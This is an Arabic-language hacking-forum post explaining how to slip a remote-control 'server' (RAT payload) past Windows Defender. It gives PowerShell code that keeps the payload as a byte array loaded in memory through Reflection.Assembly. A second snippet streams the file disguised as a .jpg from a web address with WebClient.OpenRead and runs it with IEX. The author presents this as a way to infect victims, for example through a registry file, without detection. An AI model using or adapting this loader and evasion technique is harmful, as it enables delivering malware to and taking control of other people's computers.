27.05.2017 ByPass Windows Defender Run Your Server With PowerShell


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,821
3,865
1
كلنا منعرف ان الويندوز ديفيندر اصبح بيصيد الـتحويل من بيس64
وبيصيد الدوانلود سترينج
ان حلينا مشكلة الداونلود سترينج عن طريق عمل ستريم
فبيبقى مشكلة الكونفيرت من بيس64
لهيك رح نستغني عنها كليا :15:
ورح نخلي سيرفرنا ك بايت اراي موجود باتيات سيرفرنا بفانكشن
مع نقطة الادخال والملف الحاوي لهم خله باي امتداد تريده
وضعه برابط مباشر
رح نقوم بعمل ستريم لمحتوى الملف السابق ذكره ومن ثم تشغيل الفانكشن
هذا كل مافي الامر
رح تشوفو بالشرح ان الويندوز ديفيندر حظر عملية القيام بداونلود سترينج
وبعملية التحويل من بيس64
بس طريقتنا ولاتكلم حرف ..يعني تخطيناه وخلصنا من قصة عنترية الويندوز ديفيندر :15:
بدون تمويه ولاتشفير ولاشي
الان مع الاكواد
C#:
Function hackbacktrack
{
[Byte[]] $payload =0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    0xFF, 0xFF,
    [Reflection.Assembly]::Load($payload).EntryPoint.Invoke($null,$null)::[Reflection.Assembly]
    }
هنا الفانكشن مع بايتات سيرفرك ونقطة الادخال
هذا الملف سوه باي امتداد تريده وارفعه برابط مباشر
C#:
[System.Net.WebClient]$webClient = New-Object System.Net.WebClient
  [System.IO.Stream]$stream = $webClient.OpenRead('http://192.168.56.1/byte.jpg');
   [System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;
   [string]$results = $sr.ReadToEnd();
   IEX $results; hackbacktrack
هنا عمل ويب كلاينت ومن ثم عملية ستريم واستخدام الدالة OpenReader
بدل DownloadString نفس الطريقة بامكانك استخدامها لعمل داونلود سترينج
ولكن المشكلة في الكونفيرت كما تحدثت
المهم بعد عمل ستريم ريدر منخله بالطبع يقرا كل شي ReadToEnd
ومن ثم الناتج $results رح يحوي الفانكشن الخاصة بنا ومنشغلها
بامكانك تطبيق الاكواد هنا
على موضوع الريجيستري اللي نزلته بالقسم
الاختراق فقط بملف ريجيستري ومارح يحكيك الويندوز ديفيندر حرف
او استخدم الاكواد مباشرة بمشروعك باي لغة تريدها
مش شرط الموضوع هذا ..الفكرة انه الويندوز ديفيندر ماعاد يصيدك
خله نايم
الفديو بالمرفقات​
 

المرفقات